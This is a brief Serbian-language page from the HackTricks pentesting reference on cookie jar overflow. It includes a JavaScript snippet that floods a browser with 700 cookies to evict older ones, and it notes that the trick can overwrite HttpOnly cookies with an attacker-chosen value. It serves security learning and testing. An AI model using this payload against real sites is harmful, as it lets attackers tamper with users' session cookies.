{{#include ../../banners/hacktricks-training.md}}

Pregledači imaju **ograničenje na broj kolačića** koje mogu da sačuvaju za stranicu. Tada, ako iz nekog razloga treba da **naterate kolačić da nestane**, možete **prepuniti posudu za kolačiće** jer će najstariji biti obrisani pre:
```javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
```
Napomena, da treće strane kolačići koji upućuju na drugačiju domenu neće biti prepisani.

> [!CAUTION]
> Ovaj napad se takođe može koristiti za **prepisivanje HttpOnly kolačića jer ga možete obrisati, a zatim resetovati sa vrednošću koju želite**.
>
> Proverite ovo u [**ovom postu sa laboratorijom**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).

{{#include ../../banners/hacktricks-training.md}}